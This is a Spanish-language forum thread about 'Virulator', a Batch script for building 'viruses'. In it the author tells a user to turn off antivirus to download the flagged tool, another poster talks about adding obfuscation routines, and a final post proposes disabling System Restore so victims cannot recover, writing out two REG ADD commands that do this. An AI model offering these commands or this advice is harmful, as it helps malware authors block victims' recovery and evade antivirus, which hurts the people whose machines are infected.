[Batch] Virulator 1.0c

Iniciado por Eleкtro, 13 Junio 2012, 12:04 PM

0 Miembros y 1 Visitante están viendo este tema.

Eleкtro

Cita de: Duning en 30 Julio 2012, 22:38 PMDios mio pedazo curro xD, pero en las imágenes las tildes no se te ven, eso lo has corregido? porque a mi me pasaba y aqui encontré como :D
http://foro.elhacker.net/scripting/caracteres_especiales_en_batch_espero_les_sirva-t270247.0.html
No te preocupes, Es algo que se me pasó (únicamente) al tomar las capturas. (No quise volverlas a hacer, Soy un vago xD).

Cita de: Duning en 30 Julio 2012, 22:38 PM
Y tengo unas dudas que me gustaría consultar contigo que se ve que sabes mucho, podríamos tratarlas por mensajes privados?
Si son dudas puntuales no hay problema, Si son dudas más profundizadas quizás te convendría crear un topic con todas tús preguntas para que te podamos ayudar entre todos, Y de paso les sirva al resto de usuarios.

Salu2.








Danirs

Buenas!

Al intentar descargarme el script de la pagina me sale que hay un troyano y me bloquea la pagina... :huh: :huh: que puede ser?
Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.

Eleкtro

Cita de: Danirs en 31 Julio 2012, 02:48 AMAl intentar descargarme el script de la pagina me sale que hay un troyano y me bloquea la pagina... :huh: :huh: que puede ser?
El script es detectado como virus por algunos AV's (Seguramente por los códigos VisualBasicScript que usa), Pero es un falso positivo, Virulator es una herramienta para crear "virus", Pero no es ninguna amenaza de infección de virus. Desactiva el AV que uses y déscarga el script si deseas.

Aquí tienes más info:
Cita de: m0rf en 18 Julio 2012, 22:06 PM
LINK:http://foro.elhacker.net/scripting/datos_analisis_av_continuado_virulator_rutinas_ofuscacion_nuevas-t367258.0.html

Saludos.








Danirs

Gracias efectivamente era eso que tu decias.
Desactivo y ya esta.
Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.

dato000

Viejo, esto en palabras de un n00b como yo, es MAGIA!!!!

gracias por ser tan genial sensei




m0rf

Cita de: EleKtro H@cker en 31 Julio 2012, 03:14 AM
El script es detectado como virus por algunos AV's (Seguramente por los códigos VisualBasicScript que usa), Pero es un falso positivo, Virulator es una herramienta para crear "virus", Pero no es ninguna amenaza de infección de virus. Desactiva el AV que uses y déscarga el script si deseas.

Aquí tienes más info:
Saludos.

El proyecto no esta abandonado, espero sacar la primera versión antes de final de año.

La cosa es que me motivé mucho y empece a seleccionar más lenguajes de script para ofuscar xDD

Ya os contaré...
Si todos fuéramos igual de inteligentes no existiría la mediocridad porque no podríamos apreciarla. Aprecias la mediocridad?



AdeLax

Yo tengo un problema cuando lo ejecuto me sale este mensaje No se encuentra el archivo de comandos c:\....invisible.vbs y en la consola aparece "El sistema no puede encontrar la ruta especificada

Alguna solucion ??

scalverth

Quiero dar una idea, agregar la opción de des-habilitar restaurar sistema, la mayoría de los usuarios cuando entran en pánico por virus intentan usar esta herramienta, linda sorpresa les espera.  :xD

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_SZ /d 1 /F
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_SZ /d 1 /F

Saludos.